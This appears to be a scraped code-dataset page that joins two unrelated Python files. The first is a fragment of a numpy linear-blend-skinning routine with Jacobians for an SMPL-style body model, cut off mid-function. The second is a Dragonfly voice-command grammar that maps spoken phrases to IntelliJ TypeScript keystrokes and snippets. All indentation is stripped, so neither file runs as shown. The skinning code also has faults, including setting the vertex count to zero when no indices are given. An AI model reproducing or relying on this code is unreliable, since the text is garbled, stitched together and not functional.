t_3 = time.time()
print('brgd breakdown {} {} {} '.format(t_1-t_0, t_2-t_1, t_3-t_2))
return posed_joints, posed_joints_jac, rel_transforms, rel_transforms_jac
def prepare_J(betas, v_template, shapedirs, J_regressor, n_v):
# Add shape contribution
v_shaped = v_template + blend_shapes_np(betas, shapedirs)
# Get the joints
# NxJx3 array
J = vertices2joints_np(J_regressor, v_shaped)
n_j = J_regressor.shape[0]
batch_size = betas.shape[0]
homogen_coord = np.ones((batch_size, n_v, 1), dtype=v_template.dtype)
transform_jac_chain = np.zeros((batch_size, n_j, n_j, 3, 4, 4), dtype=v_template.dtype)
return J, v_shaped, homogen_coord, transform_jac_chain
def rel_to_direct(pose, parents):
rot_mats, rot_mat_jacs = batch_rodrigues_np(pose)
b = pose.shape[0]
rot_chain = np.zeros((b, parents.shape[0], 3, 3))
rot_chain[:, 0] = rot_mats[:, 0]
for i in range(1, parents.shape[0]):
rot_chain[:, i] = np.matmul(rot_chain[:, parents[i]], rot_mats[:, i])
pose_dir = np.zeros_like(pose)
n_j = int(pose.shape[1]/3)
for b in range(0, pose.shape[0]):
for i in range(0, n_j):
rv, jac = cv2.Rodrigues(rot_chain[b, i])
pose_dir[b, 3*i : 3*(i+1)] = rv.reshape(-1)
return pose_dir
def lbs_diff_fast(pose, parents,
J, v_shaped, W, W_j, homogen_coord, v_inds=None):
t_0 = time.time()
batch_size = pose.shape[0]
# print('j1:')
# print(J[0][1])
# 3. Add pose blend shapes
# N x J x 3 x 3
t_1 = time.time()
rot_mats, rot_mat_jacs = batch_rodrigues_np(pose)
# rot_mats = rot_mats.reshape((batch_size, -1, 3, 3))
n_j = rot_mats.shape[1]
if v_inds is not None:
v_shaped = v_shaped[:, v_inds, :]
n_v = v_shaped.shape[1]
v_posed = v_shaped
t_2 = time.time()
J_transformed, J_transformed_jac, A, A_jac = batch_rigid_transform_fast_diff(rot_mats, rot_mat_jacs, J, parents)
t_3 = time.time()
t_3 = time.time()
# 5. Do skinning:
# W is N x V x (J + 1)
# W = np.tile(lbs_weights.reshape(1, n_v, n_j), (batch_size, 1, 1))
# (N x V x (J + 1)) x (N x (J + 1) x 16) = N x V x 16
num_joints = n_j
T = np.matmul(W, A.reshape(batch_size, num_joints, 16)) \
.reshape((batch_size, -1, 4, 4))
# W_j = np.tile(W.reshape((batch_size, 1, 1, n_v, n_j)), (1, n_j, 3, 1, 1))
A_jact = A_jac # .transpose(0, 2, 3, 1, 4, 5)
T_jac = np.matmul(W_j, A_jact.reshape(batch_size, n_j, 3, n_j, -1))
T_jac = T_jac.reshape((batch_size, n_j, 3, n_v, 4, 4))
# N x n_j x 3 x V x 16
v_posed_homo = np.concatenate([v_posed, homogen_coord], axis=2)
v_homo = np.matmul(T, v_posed_homo.reshape((batch_size, n_v, 4, 1)))
T_j = T.reshape((batch_size, 1, 1, n_v, 4, 4))
v_posed_homo_j = v_posed_homo.reshape((batch_size, 1, 1, n_v, 4, 1))
v_homo_jac2 = np.matmul(T_jac, v_posed_homo_j)
verts = v_homo[:, :, :3, 0]
v_homo_jac = v_homo_jac2[:, :, :, :, :3, :]
verts_jac = v_homo_jac[:, :, :, :, :3, 0]
t_4 = time.time()
# print('breakdown b {} a {} rt {} f {}'.format(t_1-t_0, t_2-t_1, t_3-t_2, t_4-t_3))
return verts, verts_jac, J_transformed, J_transformed_jac, A, A_jac, J # , v_posed, v_posed_jac
# @jit
def lbs_diff(pose, posedirs, parents, J, v_shaped, lbs_weights, homogen_coord, transform_jac_chain, v_inds=None):
''' Performs Linear Blend Skinning with the given shape and pose parameters
Parameters
----------
betas : torch.tensor BxNB
The tensor of shape parameters
pose : ndarray Bx(J + 1) * 3
The pose parameters in axis-angle format
v_template ndarray BxVx3
The template mesh that will be deformed
shapedirs : torch.tensor 1xNB
The tensor of PCA shape displacements
posedirs : ndarray Px(V * 3)
The pose PCA coefficients
J_regressor : ndarray JxV
The regressor array that is used to calculate the joints from
the position of the vertices
parents: ndarray J
The array that describes the kinematic tree for the model
lbs_weights: ndarray N x V x (J + 1)
The linear blend skinning weights that represent how much the
rotation matrix of each part affects each vertex
vinds: ndarray - list of required vertex indices (if None, all vertices will be processed)
Returns
-------
verts: ndarray BxVx3
The vertices of the mesh after applying the shape and pose
displacements.
verts_jac: ndarray BxVx(J+1)x3x3
joints: ndarray BxJx3
The joints of the model
joints_jac: ndarray BxJxJx3x3
Jacobian of joints' coordinates
'''
t_0 = time.time()
batch_size = pose.shape[0]
if v_inds is not None:
lbs_weights = lbs_weights[v_inds]
n_v = len(v_inds)
else:
n_v = 0
n_j = J.shape[1]
W = np.tile(lbs_weights.reshape(1, n_v, n_j), (batch_size, 1, 1))
# W_j = np.tile(W.reshape((batch_size, 1, 1, n_v, n_j)), (1, n_j, 3, 1, 1))
W_j = W.reshape((batch_size, 1, 1, n_v, n_j))
# print('j1:')
# print(J[0][1])
# 3. Add pose blend shapes
# N x J x 3 x 3
t_1 = time.time()
rot_mats, rot_mat_jacs = batch_rodrigues_np(pose)
# rot_mats = rot_mats.reshape((batch_size, -1, 3, 3))
n_j = rot_mats.shape[1]
pose_feature = (rot_mats[:, 1:, :, :] - np.tile(np.eye(3).reshape(1, 1, 3, 3), (batch_size, n_j-1, 1, 1)))\
.reshape((batch_size, -1))
if v_inds is not None:
v_shaped = v_shaped[:, v_inds, :]
inds = np.stack([3*v_inds, 3*v_inds+1, 3*v_inds+2], axis=1).reshape(-1)
posedirs = posedirs[:, inds]
# lbs_weights = lbs_weights[v_inds]
# (N x P) x (P, V * 3) -> N x V x 3
pose_offsets = np.matmul(pose_feature, posedirs) \
.reshape((batch_size, -1, 3))
n_v = v_shaped.shape[1]
pose_offset_jacs = np.zeros((batch_size, n_j, 3, n_v, 3), dtype=pose.dtype)
for i in range (1, n_j):
pdi = np.matmul(rot_mat_jacs[:, i].reshape(-1, 9), posedirs[(i-1)*9 : i*9, :]).reshape((batch_size, 3, -1, 3))
pose_offset_jacs[:, i] = pdi
v_posed = pose_offsets + v_shaped
#NxVxJ+1x3x3
v_posed_jac = pose_offset_jacs
# print(rot_mats[0][1])
t_2 = time.time()
J_transformed, J_transformed_jac, A, A_jac = batch_rigid_transform_diff(rot_mats, rot_mat_jacs, transform_jac_chain, J, parents)
t_3 = time.time()
# 5. Do skinning:
# W is N x V x (J + 1)
# W = np.tile(lbs_weights.reshape(1, n_v, n_j), (batch_size, 1, 1))
# (N x V x (J + 1)) x (N x (J + 1) x 16) = N x V x 16
num_joints = n_j
T = np.matmul(W, A.reshape(batch_size, num_joints, 16)) \
.reshape((batch_size, -1, 4, 4))
# W_j = np.tile(W.reshape((batch_size, 1, 1, n_v, n_j)), (1, n_j, 3, 1, 1))
A_jact = A_jac #.transpose(0, 2, 3, 1, 4, 5)
T_jac = np.matmul(W_j, A_jact.reshape(batch_size, n_j, 3, n_j, -1))
T_jac = T_jac.reshape((batch_size, n_j, 3, n_v, 4, 4))
#N x n_j x 3 x V x 16
v_posed_homo = np.concatenate([v_posed, homogen_coord], axis=2)
v_homo = np.matmul(T, v_posed_homo.reshape((batch_size, n_v, 4, 1)))
# T_j = np.tile(T.reshape((batch_size, 1, 1, n_v, 4, 4)), (1, n_j, 3, 1, 1, 1))
T_j = T.reshape((batch_size, 1, 1, n_v, 4, 4))
# v_posed_jac_h = np.pad(v_posed_jac, ((0, 0), (0,0), (0,0), (0,0), (0,1))).reshape((batch_size, n_j, 3, n_v, 4, 1))
# v_posed_jac_h = v_posed_jac_h.reshape((batch_size, n_j, 3, | |
<gh_stars>0
#
# This file is part of Dragonfly.
# (c) Copyright 2007, 2008 by <NAME>
# Licensed under the LGPL.
#
# Dragonfly is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dragonfly is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Dragonfly. If not, see
# <http://www.gnu.org/licenses/>.
#
"""
This module is a simple example of Dragonfly use.
It shows how to use Dragonfly's Grammar, AppContext, and MappingRule
classes. This module can be activated in the same way as other
Natlink macros by placing it in the "My Documents\Natlink folder" or
"Program Files\NetLink/MacroSystem".
"""
from dragonfly import (Grammar, AppContext, MappingRule, Dictation,
Key, Text, IntegerRef, Function, Config, Section, Item, RuleRef, Alternative, Repetition,
CompoundRule, Choice)
import lib.format
formatMap = {
"camel case": lib.format.FormatTypes.camelCase,
"pascal case": lib.format.FormatTypes.pascalCase,
"snake case": lib.format.FormatTypes.snakeCase,
"uppercase": lib.format.FormatTypes.upperCase,
"lowercase": lib.format.FormatTypes.lowerCase,
"squash": lib.format.FormatTypes.squash,
"lowercase squash": [lib.format.FormatTypes.squash, lib.format.FormatTypes.lowerCase],
"uppercase squash": [lib.format.FormatTypes.squash, lib.format.FormatTypes.upperCase],
"squash lowercase": [lib.format.FormatTypes.squash, lib.format.FormatTypes.lowerCase],
"squash uppercase": [lib.format.FormatTypes.squash, lib.format.FormatTypes.upperCase],
"dashify": lib.format.FormatTypes.dashify,
"lowercase dashify": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.lowerCase],
"uppercase dashify": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.upperCase],
"dashify lowercase": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.lowerCase],
"dashify uppercase": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.upperCase],
"dotify": lib.format.FormatTypes.dotify,
"lowercase dotify": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.lowerCase],
"uppercase dotify": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.upperCase],
"dotify lowercase": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.lowerCase],
"dotify uppercase": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.upperCase],
"say": lib.format.FormatTypes.spokenForm,
"environment variable": [lib.format.FormatTypes.snakeCase, lib.format.FormatTypes.upperCase],
}
grammarCfg = Config("Intellij Typescript edit")
grammarCfg.cmd = Section("Language section")
grammarCfg.cmd.map = Item(
{
# navigation
# next/prev brace
# next/prev matching selection
"down [<n>]": Key("down:%(n)d"),
"down block": Key("c-rbracket"),
"down method [<n>]": Key("a-down:%(n)d"),
"down page [<n>]": Key("pgdown:%(n)d"),
"doc end": Key("c-end"),
"doc start": Key("c-home"),
"go to column <n>": Key("c-g/25") + Text(":%(n)d") + Key("enter"),
"go to declaration": Key("c-b"),
"go to implemetation": Key("sc-b"),
"go to line <n>": Key("c-g/25") + Text("%(n)d") + Key("enter"),
"go to line <n> column <m>": Key("c-g/25") + Text("%(n)d:%(m)d") + Key("enter"),
"left [<n>]": Key("left:%(n)d"),
"left <n> (word|words)": Key("c-left:%(n)d"),
"line end": Key("end"),
"line start": Key("home"),
"matching brace": Key("cs-m"),
"next error": Key("f2"),
"next position": Key("ca-right"),
"previous error": Key("s-f2"),
"previous position": Key("ca-left"),
"right [<n>]": Key("right:%(n)d"),
"right word [<n>]": Key("c-right:%(n)d"),
"up [<n>]": Key("up:%(n)d"),
"up block": Key("c-lbracket"),
"up method [<n>]": Key("a-up:%(n)d"),
"up page [<n>]": Key("pgup:%(n)d"),
"up word [<n>]": Key("c-left:%(n)d"),
# Searching
"find in file": Key("c-f"),
"find in path": Key("cs-f"),
"find usage": Key("a-f7"),
"find next": Key("f3"),
"find previous": Key("s-f3"),
"find word": Key("c-f3"),
"replace in file": Key("c-r"),
"replace in pat": Key("sc-r"),
"select word <n>": Key("c-w:%(n)d"),
# function keys
"F one": Key("f1"),
"F two": Key("f2"),
"F three": Key("f3"),
"F four": Key("f4"),
"F five": Key("f5"),
"F six": Key("f6"),
"F Seven": Key("f7"),
"F eight": Key("f8"),
"F nine": Key("f9"),
"F ten": Key("f10"),
"F eleven": Key("f11"),
"F 12": Key("f12"),
# letters
"(A|alpha)": Text("a"),
"(B|bravo) ": Text("b"),
"(C|charlie) ": Text("c"),
"(D|delta) ": Text("d"),
"(E|echo) ": Text("e"),
"(F|foxtrot) ": Text("f"),
"(G|golf) ": Text("g"),
"(H|hotel) ": Text("h"),
"(I|india|indigo) ": Text("i"),
"(J|juliet) ": Text("j"),
"(K|kilo) ": Text("k"),
"(L|lima) ": Text("l"),
"(M|mike) ": Text("m"),
"(N|november) ": Text("n"),
"(O|oscar) ": Text("o"),
"(P|papa|poppa) ": Text("p"),
"(Q|quebec|quiche) ": Text("q"),
"(R|romeo) ": Text("r"),
"(S|sierra) ": Text("s"),
"(T|tango) ": Text("t"),
"(U|uniform) ": Text("u"),
"(V|victor) ": Text("v"),
"(W|whiskey) ": Text("w"),
"(X|x-ray) ": Text("x"),
"(Y|yankee) ": Text("y"),
"(Z|zulu) ": Text("z"),
# Typescript keywords, defined as commands so case etc is correct
"abstract": Text("abstract "),
"as": Text("as "),
"async": Text("async "),
"await": Text("await "),
"break": Text("break") + Key("enter"),
"case": Text("case :") + Key("left"),
"catch": Text("catch(err) {") + Key("enter"),
"class <text>": Text("class ") + Function(lib.format.pascal_case_text) + Text(" {") + Key("enter"),
"const <text>": Text("const ") + Function(lib.format.camel_case_text),
"constructor": Text("constructor () {") + Key("left:3"),
"continue": Text("continue") + Key("enter"),
"declare": Text("declare "),
"default": Text("default "),
"delete <text>": Text("delete ") + Function(lib.format.camel_case_text),
"do": Text("do "),
"else": Text(" else {") + Key("enter"),
"enum <text>": Text("enum ") + Function(lib.format.pascal_case_text) + Text(" {") + Key("enter"),
"export": Text("export "),
"extends <text>": Text("extends ") + Function(lib.format.pascal_case_text),
"false": Text("false"),
"finally": Text("finally {") + Key("enter"),
"for of <text>": Text("for (const elem of ") + Function(lib.format.pascal_case_text) + Text("){"),
"for in <text>": Text("for (const key of ") + Function(lib.format.pascal_case_text) + Text("){"),
"function <text>": Text("function ") + Function(lib.format.pascal_case_text) + Text("() {") + Key("enter") + Key("cs-m") + Key("left:2"),
"from": Text("from ''") + Key("left"),
"get <text>": Text("get ") + Function(lib.format.camel_case_text) + Text("() {") + Key("enter") + Text("return "),
"if": Text("if () {") + Key("enter") + Key("cs-m") + Key("left"),
"implements <text>": Text("implements ") + Function(lib.format.pascal_case_text),
"import": Text("import "),
"in": Text("in "),
"interface <text>": Text("interface ") + Function(lib.format.pascal_case_text) + Text(" {") + Key("enter"),
"instance of": Text("instanceof "),
"let <text>": Text("let ") + Function(lib.format.camel_case_text),
"new": Text("new "),
"null": Text("null "),
"package": Text("package "),
"private <text>": Text("private ") + Function(lib.format.camel_case_text),
"protected": Text("protected "),
"public": Text("public "),
"read only": Text("readonly "),
"return": Text("return "),
"set <text>": Text("set ") + Function(lib.format.camel_case_text) + Text("() {") + Key("enter") + Key("cs-m") + Key("left:2"),
"static": Text("static "),
"super": Text("super("),
"switch": Text("switch () {") + Key("enter") + Text("case :") + Key("enter") + Text("break") + Key("cs-m") + Key("left:2"),
"this": Text("this"),
"true": Text("true"),
"try": Text("try {") + Key("enter") + Key("down:2") + Text("catch (err) {") + Key("enter") + Key("cs-m") + Key("up"),
"type": Text("type "),
"type of": Text("typeof"),
"undefined": Text("undefined"),
"void": Text("void"),
"while": Text("while () {") + Key("enter") + Key("cs-m") + Key("left:2"),
# common methods
"log": Text("console.log(\""),
# common types
"any": Text("any"),
"boolean": Text("boolean"),
"map": Text("Map"),
"number": Text("number"),
"new map": Text("Map<>(") + Key("left:2"),
"string": Text("string"),
# symbols, puncuation etc
"bar": Text(" | "),
"equal to": Text(" === "),
"equals": Text(" = "),
"greater than": Text(" > "),
"greater than or equal 2": Text(" >= "),
"less than": Text(" < "),
"less than or equal 2": Text(" <= "),
"not equal to": Text(" !== "),
"angle bracket": Key("langle"),
"close angle bracket": Key("rangle"),
"square bracket": Text("["),
"close square bracket": Text("]"),
"brace": Key("lbrace"),
"close brace": Key("rbrace"),
"paren": Key("lparen"),
"close paren": Key("rparen"),
"quote": Key("dquote"),
"single quote": Key("squote"),
"colon [<n>]": Key("colon:%(n)d"),
"semi-colon [<n>]": Key("semicolon:%(n)d"),
"comma [<n>]": Key("comma:%(n)d"),
"dot [<n>]": Key("dot:%(n)d"),
"(dash|hyphen|minus) [<n>]": Key("hyphen:%(n)d"),
"underscore [<n>]": Key("underscore:%(n)d"),
"plus": Text(" + "),
"bang": Text("!"),
"at": Text("@"),
# Formatting <n> words to the left of the cursor.
"camel case <n>": Function(lib.format.camel_case_count),
"camel case <text>": Function(lib.format.camel_case_text),
"pascal case <n>": Function(lib.format.pascal_case_count),
"pascal case <text>": Function(lib.format.pascal_case_text),
"snake case <n>": Function(lib.format.snake_case_count),
"snake case <text>": Function(lib.format.snake_case_text),
"squash <n>": Function(lib.format.squash_count),
"expand <n>": Function(lib.format.expand_count),
"uppercase <n>": Function(lib.format.uppercase_count),
"uppercase <text>": Function(lib.format.uppercase_text),
"lowercase <n>": Function(lib.format.lowercase_count),
"lowercase <text>": Function(lib.format.lowercase_text),
# Format dictated words. See the formatMap for all available types.
# Ex: "camel case my new variable" -> "myNewVariable"
# Ex: "snake case my new variable" -> "my_new_variable"
# Ex: "uppercase squash my new hyphen variable" -> "MYNEW-VARIABLE"
# "<formatType> <text>": Function(lib.format.format_text),
# editing
# For writing words that would otherwise be characters or commands.
# Ex: "period", tab", "left", "right", "home", select word
"cut": Key("c-x"),
"dictate <text>": Text("%(text)s"),
"duplicate line": Key("c-d"),
"escape": Key("escape"),
"format": Key("csa-p"),
"paste": Key("c-v"),
"save": Key("c-s"),
"undo": Key("c-z"),
},
namespace={
"Key": Key,
"Text": Text,
}
)
#
class KeystrokeRule(MappingRule):
exported = False
mapping = grammarCfg.cmd.map
extras = [
IntegerRef("n", 1, 1000),
IntegerRef("m", 1, 1000),
Dictation("text"),
Dictation("text2"),
]
defaults = {
"n": 1,
}
alternatives = []
alternatives.append(RuleRef(rule=KeystrokeRule()))
single_action = Alternative(alternatives)
sequence = Repetition(single_action, min=1, max=8, name="sequence")
class RepeatRule(CompoundRule):
# Here we define this rule's spoken-form and special elements.
spec = "<sequence> [[[and] repeat [that]] <n> times]"
extras = [
sequence, # Sequence of actions defined above.
IntegerRef("n", 1, 1000), # Times to repeat the sequence.
]
defaults = {
"n": 1, # Default repeat count.
}
def _process_recognition(self, node, extras): # @UnusedVariable
sequence = extras["sequence"] # A sequence of actions.
count = extras["n"] # An integer repeat count.
for i in range(count): # @UnusedVariable
for action in sequence:
action.execute()
grammar = Grammar("IntelliJ Typescript edit", context=AppContext(executable="idea64"))
grammar.add_rule(RepeatRule()) # Add the top-level rule.
grammar.load() # Load the grammar.
# ---------------------------------------------------------------------------
# Create this module's grammar and the context under which it'll be active.
# grammar_context = AppContext(executable="idea64")
# grammar = Grammar("idea", |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.